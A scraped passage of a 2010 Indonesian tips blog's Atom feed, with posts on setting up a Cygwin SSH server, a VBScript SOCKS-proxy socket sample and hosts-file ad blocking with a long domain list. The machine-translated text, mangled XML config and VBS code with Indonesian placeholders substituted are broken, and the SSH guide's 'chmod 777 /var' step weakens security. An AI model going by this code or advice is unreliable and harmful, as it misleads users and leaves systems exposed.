terjemahan alternatif" class="hps"&gt;can&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;create a&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;configuration&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;can&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;be set as&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;a free way&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;out&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;without&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;limits&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;....&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span id="result_box" class="short_text" lang="en"&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-9023247489831024336?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/9023247489831024336/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/12/openssh.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/9023247489831024336'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/9023247489831024336'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/12/openssh.html' title='openssh'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-6843073885823510580</id><published>2010-12-28T02:45:00.000-08:00</published><updated>2010-12-28T02:57:37.508-08:00</updated><title type='text'>SSH tunneling server</title><content type='html'>Sekarang sudah mulai terbiasa memakai Linux, tetapi sekarang ada  kendala ketika akan akses server berbasiskan Windows. Setelah browsing,  maka saya berhasil menginstall SSH server di komputer saya (notebook  windows XP). &lt;p&gt;Yang perlu dilakukan cukup sederhana, yaitu :&lt;/p&gt; &lt;ol&gt;&lt;li&gt;Install linux emulator, yaitu cygwin&lt;br /&gt;Download di http://www.cygwin.com atau download filenya &lt;a href="http://www.cygwin.com/setup.exe"&gt;disini &lt;img src="http://www.cygwin.com/cygwin-icon.gif" alt="" height="28" width="28"&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Jalankan file setup.exe&lt;br /&gt;- Saat dipilih install untuk diri sendiri atau semua user, pilih  intalasi untuk semua user&lt;br /&gt;- Pilih &lt;strong&gt;Local Package Directory&lt;/strong&gt; yaitu default di  c:\cygwin&lt;br /&gt;- pilih lokasi download yang terdekat, kita pilih kambing.ui.edu&lt;font style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/li&gt;&lt;li&gt;Setelah daftar komponen yang akan diinstall tampil&lt;br /&gt;- tampilkan detail komponen dengan menekan tombol Full view &lt;img src="http://pigtail.net/LRP/printsrv/view-button.png" alt="" height="28" width="64"&gt;&lt;br /&gt;- Pilih komponen berikut yang harus ada dalam instalasi :&lt;br /&gt;* openssh&lt;br /&gt;* tcp_wrappers&lt;br /&gt;* difutils&lt;br /&gt;* zlip&lt;br /&gt;pastikan terinstall dengan cara klik link skip sehingga tombol &lt;img src="http://pigtail.net/LRP/printsrv/x-box.png" alt="" height="21" width="18"&gt; tampil&lt;/li&gt;&lt;li&gt;Tekan tombol Next, dan proses instalasi akan dilakukan&lt;br /&gt;- Saat selesai install, iconnya yang di desktop dibuat sekalian (biar  enakan)&lt;/li&gt;&lt;li&gt;Jalankan program Cygwin, pastikan jalan tidak ada error&lt;/li&gt;&lt;li&gt;Perbaiki keamanan folder&lt;br /&gt;- chmod +r /etc/passwd&lt;br /&gt;- chmod +r /etc/group&lt;br /&gt;- chmod 777 /var&lt;/li&gt;&lt;li&gt;Jalankan konfigurasi SSH server&lt;br /&gt;- ssh-host-config -y&lt;br /&gt;- jika ada konfirmasi dialog, jawab saja “yes”&lt;/li&gt;&lt;li&gt;Amankan konfigurasi file&lt;br /&gt;- tty ntsec&lt;/li&gt;&lt;li&gt;Jalankan SSH server&lt;br /&gt;- cygrunsrv -S sshd&lt;br /&gt;atau&lt;br /&gt;- net start sshd&lt;/li&gt;&lt;li&gt;Ujicoba dengan ssh 127.0.0.1&lt;/li&gt;&lt;/ol&gt;jika anda berhasil dalam penyambungan maka akan tampil seperti gambar berikut ini :&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://kusprayitna.staff.uii.ac.id/files/2008/08/sshd.jpg"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 491px; height: 289px;" src="http://kusprayitna.staff.uii.ac.id/files/2008/08/sshd.jpg" alt="" border="0"&gt;&lt;/a&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-6843073885823510580?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/6843073885823510580/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/12/ssh-tunneling-server.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6843073885823510580'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6843073885823510580'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/12/ssh-tunneling-server.html' title='SSH tunneling server'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-1975103685338825257</id><published>2010-12-28T02:32:00.000-08:00</published><updated>2010-12-28T02:44:57.185-08:00</updated><title type='text'>VBS SOKET PROXY</title><content type='html'>&lt;font id="result_box" class="" lang="en"&gt;&lt;font title="Klik untuk  terjemahan alternatif" class="hps"&gt;for&lt;/font&gt; &lt;font title="Klik untuk  terjemahan alternatif" class="hps"&gt;those of you who&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;want to&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;create&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;their own&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;proxy&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;using only&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;these functions&lt;/font&gt;  &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;can be&lt;/font&gt;  &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;made&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;quickly&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;:&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;examples&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;in the&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;list&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;below&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;&lt;system.net&gt;&lt;/system.net&gt;&lt;/font&gt;&lt;br /&gt;   &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;&lt;defaultproxy&gt;&lt;/defaultproxy&gt;&lt;/font&gt;  &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;enabled="false"&lt;/font&gt;  &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;useDefaultCredentials="true"&gt;&lt;/font&gt;&lt;br /&gt;     &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;&lt;bypasslist&gt;&lt;/bypasslist&gt;&lt;/font&gt;&lt;br /&gt;       &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;&lt;add&gt;&lt;/add&gt;&lt;/font&gt;  &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;address="[a-z]+\.urlgoeshere\.com$"&lt;/font&gt;  &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;/&gt;&lt;/font&gt;&lt;br /&gt;     &lt;font title="Klik untuk terjemahan alternatif" class="hps atn"&gt;&lt;&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;/&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;bypasslist&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt;&lt;br /&gt;  &lt;font title="Klik untuk terjemahan alternatif" class="hps atn"&gt;&lt;&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;/&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;defaultProxy&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps atn"&gt;&lt;&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;/&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;system.net&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;&gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;connecting&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;to the&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;proxy&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;is closed&lt;/font&gt;&lt;font class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;thus&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;allowing&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;create a&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;server&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;on&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;the&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;laptop&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;computer&lt;br /&gt;&lt;br /&gt;set socket = CreateObject("yang di gunakan untuk melakukan perintah.Socket")&lt;br /&gt;&lt;br /&gt;success = socket.UnlockComponent("perintah sesuai kadar luasa")&lt;br /&gt;If (success &lt;&gt; 1) Then&lt;br /&gt;   MsgBox "Failed to unlock component"&lt;br /&gt;   WScript.Quit&lt;br /&gt;End If&lt;br /&gt;&lt;br /&gt;'  To use a SOCKS4 or SOCKS5 proxy, simply set the following&lt;br /&gt;'  properties prior to calling Connect.  The connection may be SSL/TLS or&lt;br /&gt;'  non-secure - both will work with a SOCKS proxy.&lt;br /&gt;'  The SOCKS hostname may be a domain name or&lt;br /&gt;'  IP address:&lt;br /&gt;socket.SocksHostname = "www.mysocksproxyserver.com"&lt;br /&gt;socket.SocksPort = 1080&lt;br /&gt;socket.SocksUsername = "myProxyLogin"&lt;br /&gt;socket.SocksPassword = "myProxyPassword"&lt;br /&gt;'  Set the SOCKS version to 4 or 5 based on the version&lt;br /&gt;'  of the SOCKS proxy server:&lt;br /&gt;socket.SocksVersion = 5&lt;br /&gt;'  Note: SOCKS4 servers only support usernames without passwords.&lt;br /&gt;'  SOCKS5 servers support full login/password authentication.&lt;br /&gt;&lt;br /&gt;'  Connect to port 5555 of 192.168.1.108.&lt;br /&gt;'  hostname may be a domain name or IP address.&lt;br /&gt;hostname = "192.168.1.108"&lt;br /&gt;ssl = 0&lt;br /&gt;maxWaitMillisec = 20000&lt;br /&gt;success = socket.Connect(hostname,5555,ssl,maxWaitMillisec)&lt;br /&gt;If (success &lt;&gt; 1) Then&lt;br /&gt;   MsgBox socket.LastErrorText&lt;br /&gt;   WScript.Quit&lt;br /&gt;End If&lt;br /&gt;&lt;br /&gt;'  Set maximum timeouts for reading an writing (in millisec)&lt;br /&gt;socket.MaxReadIdleMs = 10000&lt;br /&gt;socket.MaxSendIdleMs = 10000&lt;br /&gt;&lt;br /&gt;'  The server (in this example) is going to send a "Hello World!"&lt;br /&gt;'  message.  Read it:&lt;br /&gt;&lt;br /&gt;receivedMsg = socket.ReceiveString()&lt;br /&gt;If (receivedMsg = vbNullString ) Then&lt;br /&gt;   MsgBox socket.LastErrorText&lt;br /&gt;   WScript.Quit&lt;br /&gt;End If&lt;br /&gt;&lt;br /&gt;'  Close the connection with the server&lt;br /&gt;'  Wait a max of 20 seconds (20000 millsec)&lt;br /&gt;socket.Close 20000&lt;br /&gt;&lt;br /&gt;MsgBox receivedMsg&lt;br /&gt;&lt;/font&gt;&lt;/font&gt;&lt;font id="result_box" class="" lang="en"&gt;&lt;font title="Klik untuk  terjemahan alternatif" class="hps"&gt;if&lt;/font&gt; &lt;font title="Klik untuk  terjemahan alternatif" class="hps"&gt;you&lt;/font&gt; &lt;font title="Klik untuk  terjemahan alternatif" class="hps"&gt;want to try the&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;vbs&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;script&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;form&lt;/font&gt;&lt;font title="Klik untuk terjemahan alternatif"&gt;,&lt;/font&gt; &lt;font title="Klik  untuk terjemahan alternatif" class="hps"&gt;which&lt;/font&gt; &lt;font title="Klik  untuk terjemahan alternatif" class="hps"&gt;is used&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;recognize&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;the&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;need to&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;script&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;server&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;SSH, &lt;/font&gt;&lt;/font&gt;&lt;font id="result_box" class="" lang="en"&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;ssh&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;command&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;be&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;the article&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;about&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;regarding&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;ssh.&lt;/font&gt;&lt;/font&gt;&lt;font id="result_box" class="" lang="en"&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;&lt;/font&gt;&lt;/font&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-1975103685338825257?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/1975103685338825257/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/12/vbs-soket-proxy.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1975103685338825257'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1975103685338825257'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/12/vbs-soket-proxy.html' title='VBS SOKET PROXY'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-6906053030383302613</id><published>2010-12-28T02:28:00.000-08:00</published><updated>2010-12-28T02:31:49.719-08:00</updated><title type='text'>memproteksi Jaringan</title><content type='html'>f you wanna remove those nasty ads from the pages which waste lot of time and bandwidth then here is something for you I belive it will help you a lot&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;how it works&lt;br /&gt;It's possible to set up a name server as authoritative for any domain you choose, allowing you to specify the DNS records for that domain. You can also configure most computers to be sort of mini-nameservers for themselves, so that they check their own DNS records before asking a nameserver. Either way, you get to say what hostname points to what IP address. If you haven't guessed already, the way you block ads it to provide bogus information about the domains we don't want to see - ie, all those servers out there that dedicate their existence to spewing out banner ads.&lt;br /&gt;&lt;br /&gt;The hosts file&lt;br /&gt;&lt;br /&gt;Probably the most common way people block ads like this is with something called the "hosts file". The hosts file is a simple list of hostnames and their corresponding IP addresses, which your computer looks at every time you try and contact a previously unknown hostname. If it finds an entry for the computer you're trying to reach, it sets the IP address for that computer to be whatever's in the hosts file.&lt;br /&gt;&lt;br /&gt;127.0.0.1 is a special IP address which, to a computer, always means that computer. Any time a machine sends a network request to 127.0.0.1, it is talking to itself. This is very useful when it comes to blocking ads, because all we have to do is specify the IP address of any ad server to be 127.0.0.1. And to do that, all we have to do is edit the hosts file. What will happen then is something like this:&lt;br /&gt;&lt;br /&gt;  1. you visit a web page&lt;br /&gt;  2. the web page contains a banner ad stored on the server "ads.example.com"&lt;br /&gt;  3. your computer says "ads.example.com? never heard of it. wait a second, let's see if I've got the number on me..."&lt;br /&gt;  4. your computer finds its hosts file and checks to see if ads.example.com is listed&lt;br /&gt;  5. it finds the hostname, which points to 127.0.0.1&lt;br /&gt;  6. "great", says the computer, and sends off a request to 127.0.0.1 for the banner ad that's supposed to be on the page&lt;br /&gt;  7. "oh", says the computer, and fails to show anything because it just sent a request to itself for a banner ad&lt;br /&gt;&lt;br /&gt;  Where's my hosts file?&lt;br /&gt;&lt;br /&gt;    * Windows 95 / 98 / ME: C:\Windows (I think)&lt;br /&gt;    * Windows NT: C:\WinNT\hosts&lt;br /&gt;    * Windows 2000: C:\WinNT\system32\drivers\etc\&lt;br /&gt;    * Windows XP: C:\Windows\System32\drivers\etc&lt;br /&gt;    * FreeBSD / Linux / Mac OS X / Unixish operating systems: /etc/hosts&lt;br /&gt;    * Classic Mac OS: please read this helpful information submitted by David "iNerd" B&lt;br /&gt;    * Mac OS 9: Marcia Skidmore sent in details that hopefully explain what you need to know&lt;br /&gt;&lt;br /&gt;The format of the hosts file is very simple - IP address, whitespace, then a list of hostnames (except for older Macs; please see above). However, you don't need to know anything about the format if you don't want to as you can just view the list hosts file.&lt;br /&gt;&lt;br /&gt;Of course, that's not the only way to use the list, but it's probably the most simple for most people.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;here is the hosts list which are serving you the ads just append it to your hosts file and enjoy ad free surfing makes things faster. if you want ad from certain site then just remove it from the list below.&lt;br /&gt;&lt;br /&gt;QUOTE&lt;br /&gt;127.0.0.1 007arcadegames.com&lt;br /&gt;127.0.0.1 101order.com&lt;br /&gt;127.0.0.1 123banners.com&lt;br /&gt;127.0.0.1 123found.com&lt;br /&gt;127.0.0.1 180searchassistant.com&lt;br /&gt;127.0.0.1 180solutions.com&lt;br /&gt;127.0.0.1 247media.com&lt;br /&gt;127.0.0.1 247realmedia.com&lt;br /&gt;127.0.0.1 24pm-affiliation.com&lt;br /&gt;127.0.0.1 2log.com&lt;br /&gt;127.0.0.1 2o7.net&lt;br /&gt;127.0.0.1 4affiliate.net&lt;br /&gt;127.0.0.1 4d5.net&lt;br /&gt;127.0.0.1 7adpower.com&lt;br /&gt;127.0.0.1 911promotion.com&lt;br /&gt;127.0.0.1 a-counter.kiev.ua&lt;br /&gt;127.0.0.1 a.consumer.net&lt;br /&gt;127.0.0.1 a.gismeteo.ru&lt;br /&gt;127.0.0.1 a.mktw.net&lt;br /&gt;127.0.0.1 a.r.tv.com&lt;br /&gt;127.0.0.1 a.xanga.com&lt;br /&gt;127.0.0.1 a32.g.a.yimg.com&lt;br /&gt;127.0.0.1 aaddzz.com&lt;br /&gt;127.0.0.1 abcnews.footprint.net&lt;br /&gt;127.0.0.1 abetterinternet.com&lt;br /&gt;127.0.0.1 abz.com&lt;br /&gt;127.0.0.1 ac.rnm.ca&lt;br /&gt;127.0.0.1 accelerator-media.com&lt;br /&gt;127.0.0.1 accipiter.speedera.net&lt;br /&gt;127.0.0.1 action.ientry.net&lt;br /&gt;127.0.0.1 actionsplash.com&lt;br /&gt;127.0.0.1 actualdeals.com&lt;br /&gt;127.0.0.1 ad-annex.com&lt;br /&gt;127.0.0.1 ad-flow.com&lt;br /&gt;127.0.0.1 ad-images.suntimes.com&lt;br /&gt;127.0.0.1 ad-logics.com&lt;br /&gt;127.0.0.1 ad-rotator.com&lt;br /&gt;127.0.0.1 ad-server.gulasidorna.se&lt;br /&gt;127.0.0.1 ad-souk.com&lt;br /&gt;127.0.0.1 ad-space.net&lt;br /&gt;127.0.0.1 ad-tech.com&lt;br /&gt;127.0.0.1 ad-universe.com&lt;br /&gt;127.0.0.1 ad-up.com&lt;br /&gt;127.0.0.1 ad.100.tbn.ru&lt;br /&gt;127.0.0.1 ad.37.com&lt;br /&gt;127.0.0.1 ad.4web.cz&lt;br /&gt;127.0.0.1 ad.71i.de&lt;br /&gt;127.0.0.1 ad.a8.net&lt;br /&gt;127.0.0.1 ad.abcnews.com&lt;br /&gt;127.0.0.1 ad.abctv.com&lt;br /&gt;127.0.0.1 ad.about.com&lt;br /&gt;127.0.0.1 ad.aboutit.de&lt;br /&gt;127.0.0.1 ad.aboutwebservices.com&lt;br /&gt;127.0.0.1 ad.aftonbladet.se&lt;br /&gt;127.0.0.1 ad.allstar.cz&lt;br /&gt;127.0.0.1 ad.altervista.org&lt;br /&gt;127.0.0.1 ad.asap-asp.net&lt;br /&gt;127.0.0.1 ad.bondage.com&lt;br /&gt;127.0.0.1 ad.centrum.cz&lt;br /&gt;127.0.0.1 ad.cgi.cz&lt;br /&gt;127.0.0.1 ad.chip.de&lt;br /&gt;127.0.0.1 ad.clix.pt&lt;br /&gt;127.0.0.1 ad.digitallook.com&lt;br /&gt;127.0.0.1 ad.directconnect.se&lt;br /&gt;127.0.0.1 ad.disney.go.com&lt;br /&gt;127.0.0.1 ad.domainfactory.de&lt;br /&gt;127.0.0.1 ad.dvdforum.nu&lt;br /&gt;127.0.0.1 ad.e-kolay.net&lt;br /&gt;127.0.0.1 ad.e-not.net&lt;br /&gt;127.0.0.1 ad.eurosport.com&lt;br /&gt;127.0.0.1 ad.ezpeer.com&lt;br /&gt;127.0.0.1 ad.fido.net&lt;br /&gt;127.0.0.1 ad.fragzone.se&lt;br /&gt;127.0.0.1 ad.free6.com&lt;br /&gt;127.0.0.1 ad.grafika.cz&lt;br /&gt;127.0.0.1 ad.harmony-central.com&lt;br /&gt;127.0.0.1 ad.hbv.de&lt;br /&gt;127.0.0.1 ad.howstuffworks.com&lt;br /&gt;127.0.0.1 ad.hyena.cz&lt;br /&gt;127.0.0.1 ad.iinfo.cz&lt;br /&gt;127.0.0.1 ad.ilse.nl&lt;br /&gt;127.0.0.1 ad.img.yahoo.co.kr&lt;br /&gt;127.0.0.1 ad.infoseek.com&lt;br /&gt;127.0.0.1 ad.investopedia.com&lt;br /&gt;127.0.0.1 ad.ir.ru&lt;br /&gt;127.0.0.1 ad.itmedia.co.jp&lt;br /&gt;127.0.0.1 ad.jetsoftware.com&lt;br /&gt;127.0.0.1 ad.keenspace.com&lt;br /&gt;127.0.0.1 ad.krutilka.ru&lt;br /&gt;127.0.0.1 ad.leadcrunch.com&lt;br /&gt;127.0.0.1 ad.linx.cz&lt;br /&gt;127.0.0.1 ad.liveinternet.ru&lt;br /&gt;127.0.0.1 ad.lupa.cz&lt;br /&gt;127.0.0.1 ad.mediastorm.hu&lt;br /&gt;127.0.0.1 ad.mgd.de&lt;br /&gt;127.0.0.1 ad.moscowtimes.ru&lt;br /&gt;127.0.0.1 ad.musicmatch.com&lt;br /&gt;127.0.0.1 ad.mwizard.net&lt;br /&gt;127.0.0.1 ad.nachtagenten.de&lt;br /&gt;127.0.0.1 ad.nozonedata.com&lt;br /&gt;127.0.0.1 ad.nrk.no&lt;br /&gt;127.0.0.1 ad.pbs.bb.ru&lt;br /&gt;127.0.0.1 ad.playground.ru&lt;br /&gt;127.0.0.1 ad.preferances.com&lt;br /&gt;127.0.0.1 ad.rambler.ru&lt;br /&gt;127.0.0.1 ad.reunion.com&lt;br /&gt;127.0.0.1 ad.seznam.cz&lt;br /&gt;127.0.0.1 ad.simgames.net&lt;br /&gt;127.0.0.1 ad.spieletips.de&lt;br /&gt;127.0.0.1 ad.suprnova.org&lt;br /&gt;127.0.0.1 ad.surfsecret.com&lt;br /&gt;127.0.0.1 ad.sweclockers.com&lt;br /&gt;127.0.0.1 ad.t2t2.com&lt;br /&gt;127.0.0.1 ad.tbn.ru&lt;br /&gt;127.0.0.1 ad.tiscali.com&lt;br /&gt;127.0.0.1 ad.tisnet.net.tw&lt;br /&gt;127.0.0.1 ad.tomshardware.com&lt;br /&gt;127.0.0.1 ad.top50.to&lt;br /&gt;127.0.0.1 ad.tv2.no&lt;br /&gt;127.0.0.1 ad.tweakpc.de&lt;br /&gt;127.0.0.1 ad.uk.tangozebra.com&lt;br /&gt;127.0.0.1 ad.uol.com.br&lt;br /&gt;127.0.0.1 ad.usatoday.com&lt;br /&gt;127.0.0.1 ad.way.cz&lt;br /&gt;127.0.0.1 ad.wz.cz&lt;br /&gt;127.0.0.1 ad.yadro.ru&lt;br /&gt;127.0.0.1 ad.yieldmanager.com&lt;br /&gt;127.0.0.1 ad.yourmedia.com&lt;br /&gt;127.0.0.1 ad01.mediacorpsingapore.com&lt;br /&gt;127.0.0.1 ad1.emediate.dk&lt;br /&gt;127.0.0.1 ad1.gamezone.com&lt;br /&gt;127.0.0.1 ad1.hardware.no&lt;br /&gt;127.0.0.1 ad1.kde.cz&lt;br /&gt;127.0.0.1 ad1.lbe.ru&lt;br /&gt;127.0.0.1 ad1.outpost.com&lt;br /&gt;127.0.0.1 ad1.zendmedia.com&lt;br /&gt;127.0.0.1 ad2.atlas.cz&lt;br /&gt;127.0.0.1 ad2.bb.ru&lt;br /&gt;127.0.0.1 ad2.insitemedia.hu&lt;br /&gt;127.0.0.1 ad2.lbe.ru&lt;br /&gt;127.0.0.1 ad2.linx.cz&lt;br /&gt;127.0.0.1 ad2.linxcz.cz&lt;br /&gt;127.0.0.1 ad2.lupa.cz&lt;br /&gt;127.0.0.1 ad2.mamma.com&lt;br /&gt;127.0.0.1 ad2.seznam.cz&lt;br /&gt;127.0.0.1 ad2.tisnet.net.tw&lt;br /&gt;127.0.0.1 ad3.tisnet.net.tw&lt;br /&gt;127.0.0.1 ad4.atlas.cz&lt;br /&gt;127.0.0.1 ad4.tisnet.net.tw&lt;br /&gt;127.0.0.1 ad41.atlas.cz&lt;br /&gt;127.0.0.1 ad4ex.com&lt;br /&gt;127.0.0.1 adbanner.ro&lt;br /&gt;127.0.0.1 adboost.de.vu&lt;br /&gt;127.0.0.1 adbot.com&lt;br /&gt;127.0.0.1 adbot.theonion.com&lt;br /&gt;127.0.0.1 adbrite.com&lt;br /&gt;127.0.0.1 adbureau.net&lt;br /&gt;127.0.0.1 adbutler.com&lt;br /&gt;127.0.0.1 adbutler.de&lt;br /&gt;127.0.0.1 adcell.de&lt;br /&gt;127.0.0.1 adcenter.mdf.se&lt;br /&gt;127.0.0.1 adcenter.net&lt;br /&gt;127.0.0.1 adcentriconline.com&lt;br /&gt;127.0.0.1 adcept.net&lt;br /&gt;127.0.0.1 adclick.com&lt;br 